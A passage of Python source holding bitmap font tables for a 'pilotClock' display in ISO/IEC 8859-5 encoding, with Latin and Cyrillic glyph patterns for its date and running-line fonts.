[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
#: Bit patterns for the pilotClock Date Out, ISO/IEC 8859-5 encoding, font height = 6
DATE_OUT_FONT = [
[0x00, 0x00, 0x00, 0x00], # 0x00
[0x00, 0x00, 0x00, 0x00], # 0x01
[0x00, 0x00, 0x00, 0x00], # 0x02
[0x00, 0x00, 0x00, 0x00], # 0x03
[0x00, 0x00, 0x00, 0x00], # 0x04
[0x00, 0x00, 0x00, 0x00], # 0x05
[0x00, 0x00, 0x00, 0x00], # 0x06
[0x00, 0x00, 0x00, 0x00], # 0x07
[0x00, 0x00, 0x00, 0x00], # 0x08
[0x00, 0x00, 0x00, 0x00], # 0x09
[0x00, 0x00, 0x00, 0x00], # 0x0A
[0x00, 0x00, 0x00, 0x00], # 0x0B
[0x00, 0x00, 0x00, 0x00], # 0x0C
[0x00, 0x00, 0x00, 0x00], # 0x0D
[0x00, 0x00, 0x00, 0x00], # 0x0E
[0x00, 0x00, 0x00, 0x00], # 0x0F
[0x00, 0x00, 0x00, 0x00], # 0x10
[0x00, 0x00, 0x00, 0x00], # 0x11
[0x00, 0x00, 0x00, 0x00], # 0x12
[0x00, 0x00, 0x00, 0x00], # 0x13
[0x00, 0x00, 0x00, 0x00], # 0x14
[0x00, 0x00, 0x00, 0x00], # 0x15
[0x00, 0x00, 0x00, 0x00], # 0x16
[0x00, 0x00, 0x00, 0x00], # 0x17
[0x00, 0x00, 0x00, 0x00], # 0x18
[0x00, 0x00, 0x00, 0x00], # 0x19
[0x00, 0x00, 0x00, 0x00], # 0x1A
[0x00, 0x00, 0x00, 0x00], # 0x1B
[0x00, 0x00, 0x00, 0x00], # 0x1C
[0x00, 0x00, 0x00, 0x00], # 0x1D
[0x00, 0x00, 0x00, 0x00], # 0x1E
[0x00, 0x00, 0x00, 0x00], # 0x1F
[0x00, 0x00], # 0x20 ' '
[0x17, 0x00], # 0x21 '!'
[0x03, 0x03, 0x00], # 0x22 '"'
[0x0A, 0x1F, 0x0A, 0x1F, 0x0A, 0x00], # 0x23 '#'
[0x16, 0x37, 0x1A, 0x00], # 0x24 '$'
[0x19, 0x04, 0x13, 0x00], # 0x25 '%'
[0x1B, 0x17, 0x18, 0x14, 0x00], # 0x26 '&'
[0x03, 0x00], # 0x27 '''
[0x0E, 0x11, 0x00], # 0x28 '('
[0x11, 0x0E, 0x00], # 0x29 ')'
[0x14, 0x08, 0x14, 0x00], # 0x2A '*'
[0x08, 0x1C, 0x08, 0x00], # 0x2B '+'
[0x20, 0x10, 0x00], # 0x2C ','
[0x04, 0x04, 0x00], # 0x2D '-'
[0x10, 0x00], # 0x2E '.'
[0x18, 0x04, 0x03, 0x00], # 0x2F '/'
[0x1F, 0x11, 0x1F, 0x00], # 0x30 '0'
[0x11, 0x1F, 0x10, 0x00], # 0x31 '1'
[0x1D, 0x15, 0x17, 0x00], # 0x32 '2'
[0x15, 0x15, 0x1F, 0x00], # 0x33 '3'
[0x07, 0x04, 0x1F, 0x00], # 0x34 '4'
[0x17, 0x15, 0x1D, 0x00], # 0x35 '5'
[0x1F, 0x15, 0x1D, 0x00], # 0x36 '6'
[0x01, 0x01, 0x1F, 0x00], # 0x37 '7'
[0x1F, 0x15, 0x1F, 0x00], # 0x38 '8'
[0x17, 0x15, 0x1F, 0x00], # 0x39 '9'
[0x12, 0x00], # 0x3A ':'
[0x20, 0x12, 0x00], # 0x3B ';'
[0x04, 0x0A, 0x11, 0x00], # 0x3C '<'
[0x0A, 0x0A, 0x00], # 0x3D '='
[0x11, 0x0A, 0x04, 0x00], # 0x3E '>'
[0x01, 0x15, 0x03, 0x00], # 0x3F '?'
[0x0E, 0x11, 0x15, 0x17], # 0x40 '@'
[0x1F, 0x05, 0x1F, 0x00], # 0x41 'A'
[0x1F, 0x15, 0x1B, 0x00], # 0x42 'B'
[0x1F, 0x11, 0x11, 0x00], # 0x43 'C'
[0x1F, 0x11, 0x0E, 0x00], # 0x44 'D'
[0x1F, 0x15, 0x15, 0x00], # 0x45 'E'
[0x1F, 0x05, 0x05, 0x00], # 0x46 'F'
[0x1F, 0x11, 0x1D, 0x00], # 0x47 'G'
[0x1F, 0x04, 0x1F, 0x00], # 0x48 'H'
[0x1F, 0x00], # 0x49 'I'
[0x18, 0x10, 0x1F, 0x00], # 0x4A 'J'
[0x1F, 0x04, 0x1B, 0x00], # 0x4B 'K'
[0x1F, 0x10, 0x10, 0x00], # 0x4C 'L'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0x4D 'M'
[0x1F, 0x01, 0x1E, 0x00], # 0x4E 'N'
[0x1F, 0x11, 0x1F, 0x00], # 0x4F 'O'
[0x1F, 0x05, 0x07, 0x00], # 0x50 'P'
[0x1F, 0x11, 0x1F, 0x20, 0x00], # 0x51 'Q'
[0x1F, 0x05, 0x1B, 0x00], # 0x52 'R'
[0x17, 0x15, 0x1D, 0x00], # 0x53 'S'
[0x01, 0x1F, 0x01, 0x00], # 0x54 'T'
[0x1F, 0x10, 0x1F, 0x00], # 0x55 'U'
[0x0F, 0x10, 0x0F, 0x00], # 0x56 'V'
[0x1F, 0x10, 0x0F, 0x10, 0x1F, 0x00], # 0x57 'W'
[0x1B, 0x04, 0x1B, 0x00], # 0x58 'X'
[0x03, 0x1C, 0x03, 0x00], # 0x59 'Y'
[0x19, 0x15, 0x13, 0x00], # 0x5A 'Z'
[0x1F, 0x11, 0x00], # 0x5B '['
[0x03, 0x04, 0x18, 0x00], # 0x5C '\'
[0x11, 0x1F, 0x00], # 0x5D ']'
[0x02, 0x01, 0x02, 0x00], # 0x5E '^'
[0x10, 0x10, 0x10, 0x00], # 0x5F '_'
[0x01, 0x02, 0x00], # 0x60 '`'
[0x1F, 0x05, 0x1F, 0x00], # 0x61 'a'
[0x1F, 0x15, 0x1B, 0x00], # 0x62 'b'
[0x1F, 0x11, 0x11, 0x00], # 0x63 'c'
[0x1F, 0x11, 0x0E, 0x00], # 0x64 'd'
[0x1F, 0x15, 0x15, 0x00], # 0x65 'e'
[0x1F, 0x05, 0x05, 0x00], # 0x66 'f'
[0x1F, 0x11, 0x1D, 0x00], # 0x67 'g'
[0x1F, 0x04, 0x1F, 0x00], # 0x68 'h'
[0x1F, 0x00], # 0x69 'i'
[0x18, 0x10, 0x1F, 0x00], # 0x6A 'j'
[0x1F, 0x04, 0x1B, 0x00], # 0x6B 'k'
[0x1F, 0x10, 0x10, 0x00], # 0x6C 'l'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0x6D 'm'
[0x1F, 0x01, 0x1E, 0x00], # 0x6E 'n'
[0x1F, 0x11, 0x1F, 0x00], # 0x6F 'o'
[0x1F, 0x05, 0x07, 0x00], # 0x70 'p'
[0x1F, 0x11, 0x1F, 0x20, 0x00], # 0x71 'q'
[0x1F, 0x05, 0x1B, 0x00], # 0x72 'r'
[0x17, 0x15, 0x1D, 0x00], # 0x73 's'
[0x01, 0x1F, 0x01, 0x00], # 0x74 't'
[0x1F, 0x10, 0x1F, 0x00], # 0x75 'u'
[0x0F, 0x10, 0x0F, 0x00], # 0x76 'v'
[0x1F, 0x10, 0x0F, 0x10, 0x1F, 0x00], # 0x77 'w'
[0x1B, 0x04, 0x1B, 0x00], # 0x78 'x'
[0x03, 0x1C, 0x03, 0x00], # 0x79 'y'
[0x19, 0x15, 0x13, 0x00], # 0x7A 'z'
[0x04, 0x1B, 0x11, 0x00], # 0x7B '{'
[0x1F, 0x00], # 0x7C '|'
[0x11, 0x1B, 0x04, 0x00], # 0x7D '}'
[0x02, 0x01, 0x02, 0x01, 0x00], # 0x7E '~'
[0x00, 0x00, 0x00, 0x00], # 0x7F
[0x00, 0x00, 0x00, 0x00], # 0x80
[0x00, 0x00, 0x00, 0x00], # 0x81
[0x00, 0x00, 0x00, 0x00], # 0x82
[0x00, 0x00, 0x00, 0x00], # 0x83
[0x00, 0x00, 0x00, 0x00], # 0x84
[0x00, 0x00, 0x00, 0x00], # 0x85
[0x00, 0x00, 0x00, 0x00], # 0x86
[0x00, 0x00, 0x00, 0x00], # 0x87
[0x00, 0x00, 0x00, 0x00], # 0x88
[0x00, 0x00, 0x00, 0x00], # 0x89
[0x00, 0x00, 0x00, 0x00], # 0x8A
[0x00, 0x00, 0x00, 0x00], # 0x8B
[0x00, 0x00, 0x00, 0x00], # 0x8C
[0x00, 0x00, 0x00, 0x00], # 0x8D
[0x00, 0x00, 0x00, 0x00], # 0x8E
[0x00, 0x00, 0x00, 0x00], # 0x8F
[0x00, 0x00, 0x00, 0x00], # 0x90
[0x00, 0x00, 0x00, 0x00], # 0x91
[0x00, 0x00, 0x00, 0x00], # 0x92
[0x00, 0x00, 0x00, 0x00], # 0x93
[0x00, 0x00, 0x00, 0x00], # 0x94
[0x00, 0x00, 0x00, 0x00], # 0x95
[0x00, 0x00, 0x00, 0x00], # 0x96
[0x00, 0x00, 0x00, 0x00], # 0x97
[0x00, 0x00, 0x00, 0x00], # 0x98
[0x00, 0x00, 0x00, 0x00], # 0x99
[0x00, 0x00, 0x00, 0x00], # 0x9A
[0x00, 0x00, 0x00, 0x00], # 0x9B
[0x00, 0x00, 0x00, 0x00], # 0x9C
[0x00, 0x00, 0x00, 0x00], # 0x9D
[0x00, 0x00, 0x00, 0x00], # 0x9E
[0x00, 0x00, 0x00, 0x00], # 0x9F
[0x00, 0x00, 0x00, 0x00], # 0xA0 NBSP
[0x1F, 0x15, 0x15, 0x00], # 0xA1 'Ё'
[0x00, 0x00, 0x00, 0x00], # 0xA2 'Ђ'
[0x00, 0x00, 0x00, 0x00], # 0xA3 'Ѓ'
[0x0E, 0x15, 0x11, 0x00], # 0xA4 'Є'
[0x00, 0x00, 0x00, 0x00], # 0xA5 'Ѕ'
[0x00, 0x00, 0x00, 0x00], # 0xA6 'І'
[0x01, 0x1E, 0x01, 0x00], # 0xA7 'Ї'
[0x00, 0x00, 0x00, 0x00], # 0xA8 'Ј'
[0x00, 0x00, 0x00, 0x00], # 0xA9 'Љ'
[0x00, 0x00, 0x00, 0x00], # 0xAA 'Њ'
[0x00, 0x00, 0x00, 0x00], # 0xAB 'Ћ'
[0x00, 0x00, 0x00, 0x00], # 0xAC 'Ќ'
[0x00, 0x00, 0x00, 0x00], # 0xAD SHY
[0x00, 0x00, 0x00, 0x00], # 0xAE 'Ў'
[0x00, 0x00, 0x00, 0x00], # 0xAF 'Џ'
[0x1F, 0x05, 0x1F, 0x00], # 0xB0 'А'
[0x1F, 0x15, 0x19, 0x00], # 0xB1 'Б'
[0x1F, 0x15, 0x1B, 0x00], # 0xB2 'В'
[0x1F, 0x01, 0x01, 0x00], # 0xB3 'Г'
[0x30, 0x1F, 0x11, 0x1F, 0x30, 0x00], # 0xB4 'Д'
[0x1F, 0x15, 0x15, 0x00], # 0xB5 'Е'
[0x1B, 0x04, 0x1F, 0x04, 0x1B, 0x00], # 0xB6 'Ж'
[0x15, 0x15, 0x1B, 0x00], # 0xB7 'З'
[0x0F, 0x10, 0x1F, 0x00], # 0xB8 'И'
[0x0F, 0x10, 0x1F, 0x00], # 0xB9 'Й'
[0x1F, 0x04, 0x1B, 0x00], # 0xBA 'К'
[0x1E, 0x01, 0x1F, 0x00], # 0xBB 'Л'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0xBC 'М'
[0x1F, 0x04, 0x1F, 0x00], # 0xBD 'Н'
[0x1F, 0x11, 0x1F, 0x00], # 0xBE 'О'
[0x1F, 0x01, 0x1F, 0x00], # 0xBF 'П'
[0x1F, 0x05, 0x07, 0x00], # 0xC0 'Р'
[0x1F, 0x11, 0x11, 0x00], # 0xC1 'С'
[0x01, 0x1F, 0x01, 0x00], # 0xC2 'Т'
[0x17, 0x14, 0x1F, 0x00], # 0xC3 'У'
[0x07, 0x05, 0x1F, 0x05, 0x07, 0x00], # 0xC4 'Ф'
[0x1B, 0x04, 0x1B, 0x00], # 0xC5 'Х'
[0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xC6 'Ц'
[0x07, 0x04, 0x1F, 0x00], # 0xC7 'Ч'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x00], # 0xC8 'Ш'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xC9 'Щ'
[0x01, 0x1F, 0x14, 0x1C, 0x00], # 0xCA 'Ъ'
[0x1F, 0x14, 0x1C, 0x00, 0x1F, 0x00], # 0xCB 'Ы'
[0x1F, 0x14, 0x1C, 0x00], # 0xCC 'Ь'
[0x15, 0x15, 0x1F, 0x00], # 0xCD 'Э'
[0x1F, 0x04, 0x1F, 0x11, 0x1F, 0x00], # 0xCE 'Ю'
[0x1B, 0x05, 0x1F, 0x00], # 0xCF 'Я'
[0x1F, 0x05, 0x1F, 0x00], # 0xD0 'а'
[0x1F, 0x15, 0x19, 0x00], # 0xD1 'б'
[0x1F, 0x15, 0x1B, 0x00], # 0xD2 'в'
[0x1F, 0x01, 0x01, 0x00], # 0xD3 'г'
[0x30, 0x1F, 0x11, 0x1F, 0x30, 0x00], # 0xD4 'д'
[0x1F, 0x15, 0x15, 0x00], # 0xD5 'е'
[0x1B, 0x04, 0x1F, 0x04, 0x1B, 0x00], # 0xB6 'ж'
[0x15, 0x15, 0x1B, 0x00], # 0xD7 'з'
[0x0F, 0x10, 0x1F, 0x00], # 0xD8 'и'
[0x0F, 0x10, 0x1F, 0x00], # 0xD9 'й'
[0x1F, 0x04, 0x1B, 0x00], # 0xDA 'к'
[0x1E, 0x01, 0x1F, 0x00], # 0xDB 'л'
[0x1F, 0x01, 0x1E, 0x01, 0x1F, 0x00], # 0xDC 'м'
[0x1F, 0x04, 0x1F, 0x00], # 0xDD 'н'
[0x1F, 0x11, 0x1F, 0x00], # 0xDE 'о'
[0x1F, 0x01, 0x1F, 0x00], # 0xDF 'п'
[0x1F, 0x05, 0x07, 0x00], # 0xE0 'р'
[0x1F, 0x11, 0x11, 0x00], # 0xE1 'с'
[0x01, 0x1F, 0x01, 0x00], # 0xE2 'т'
[0x17, 0x14, 0x1F, 0x00], # 0xE3 'у'
[0x07, 0x05, 0x1F, 0x05, 0x07, 0x00], # 0xE4 'ф'
[0x1B, 0x04, 0x1B, 0x00], # 0xE5 'х'
[0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xE6 'ц'
[0x07, 0x04, 0x1F, 0x00], # 0xE7 'ч'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x00], # 0xE8 'ш'
[0x1F, 0x10, 0x1F, 0x10, 0x1F, 0x30, 0x00], # 0xE9 'щ'
[0x01, 0x1F, 0x14, 0x1C, 0x00], # 0xEA 'ъ'
[0x1F, 0x14, 0x1C, 0x00, 0x1F, 0x00], # 0xEB 'ы'
[0x1F, 0x14, 0x1C, 0x00], # 0xEC 'ь'
[0x15, 0x15, 0x1F, 0x00], # 0xED 'э'
[0x1F, 0x04, 0x1F, 0x11, 0x1F, 0x00], # 0xEE 'ю'
[0x1B, 0x05, 0x1F, 0x00], # 0xEF 'я'
[0x1F, 0x04, 0x1F, 0x00, 0x01, 0x00], # 0xF0 '№'
[0x1F, 0x15, 0x15, 0x00], # 0xF1 'ё'
[0x00, 0x00, 0x00, 0x00], # 0xF2 'ђ'
[0x00, 0x00, 0x00, 0x00], # 0xF3 'ѓ'
[0x0E, 0x15, 0x11, 0x00], # 0xF4 'є'
[0x00, 0x00, 0x00, 0x00], # 0xF5 'ѕ'
[0x00, 0x00, 0x00, 0x00], # 0xF6 'і'
[0x01, 0x1E, 0x01, 0x00], # 0xF7 'ї'
[0x00, 0x00, 0x00, 0x00], # 0xF8 'ј'
[0x00, 0x00, 0x00, 0x00], # 0xF9 'љ'
[0x00, 0x00, 0x00, 0x00], # 0xFA 'њ'
[0x00, 0x00, 0x00, 0x00], # 0xFB 'ћ'
[0x00, 0x00, 0x00, 0x00], # 0xFC 'ќ'
[0x2F, 0x2D, 0x3D, 0x00], # 0xFD '§'
[0x00, 0x00, 0x00, 0x00], # 0xFE 'ў'
[0x00, 0x00, 0x00, 0x00], # 0xFF 'џ'
]
#: Bit patterns for the pilotClock Run Line, ISO/IEC 8859-5 encoding, font height = 9
RUN_LINE_FONT = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000], # 0x20 ' '
[0x005F, 0x0000], # 0x21 '!'
[0x0003, 0x0000, 0x0003, 0x0000], # 0x22 '"'
[0x0024, 0x007E, 0x0024, 0x007E, 0x0024, 0x0000], # 0x23 '#'
[0x0024, 0x00CA, 0x0053, 0x0024, 0x0000], # 0x24 '$'
[0x0062, 0x0018, 0x0046, 0x0000], # 0x25 '%'
[0x003A, 0x0045, 0x003A, 0x0050, 0x0000], # 0x26 '&'
[0x0003, 0x0000], # 0x27 '''
[0x003C, 0x0042, 0x0000], # 0x28 '('
[0x0042, 0x003C, 0x0000], # 0x29 ')'
[0x0028, 0x0010, 0x0028, 0x0000], # 0x2A '*'
[0x0010, 0x0038, 0x0010, 0x0000], # 0x2B '+'
[0x0080, 0x0040, 0x0000], # 0x2C ','
[0x0010, 0x0010, 0x0010, 0x0000], # 0x2D '-'
[0x0040, 0x0000], # 0x2E '.'
[0x0060, 0x0018, 0x0006, 0x0000], # 0x2F '/'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0x30 '0'
[0x0042, 0x007F, 0x0040, 0x0000], # 0x31 '1'
[0x0062, 0x0051, 0x0049, 0x0046, 0x0000], # 0x32 '2'
[0x0022, 0x0049, 0x0049, 0x0036, 0x0000], # 0x33 '3'
[0x0018, 0x0016, 0x0011, 0x007F, 0x0000], # 0x34 '4'
[0x002F, 0x0045, 0x0045, 0x0039, 0x0000], # 0x35 '5'
[0x003E, 0x0045, 0x0045, 0x0038, 0x0000], # 0x36 '6'
[0x0001, 0x0071, 0x000D, 0x0003, 0x0000], # 0x37 '7'
[0x0036, 0x0049, 0x0049, 0x0036, 0x0000], # 0x38 '8'
[0x000E, 0x0051, 0x0051, 0x003E, 0x0000], # 0x39 '9'
[0x0044, 0x0000], # 0x3A ':'
[0x0080, 0x0044, 0x0000], # 0x3B ';'
[0x0010, 0x0028, 0x0044, 0x0000], # 0x3C '<'
[0x0028, 0x0028, 0x0028, 0x0000], # 0x3D '='
[0x0044, 0x0028, 0x0010, 0x0000], # 0x3E '>'
[0x0002, 0x0051, 0x0009, 0x0006, 0x0000], # 0x3F '?'
[0x003E, 0x0041, 0x0049, 0x0055, 0x001E, 0x0000], # 0x40 '@'
[0x007E, 0x0011, 0x0011, 0x007E, 0x0000], # 0x41 'A'
[0x007F, 0x0049, 0x0049, 0x0036, 0x0000], # 0x42 'B'
[0x003E, 0x0041, 0x0041, 0x0022, 0x0000], # 0x43 'C'
[0x007F, 0x0041, 0x0041, 0x003E, 0x0000], # 0x44 'D'
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0x45 'E'
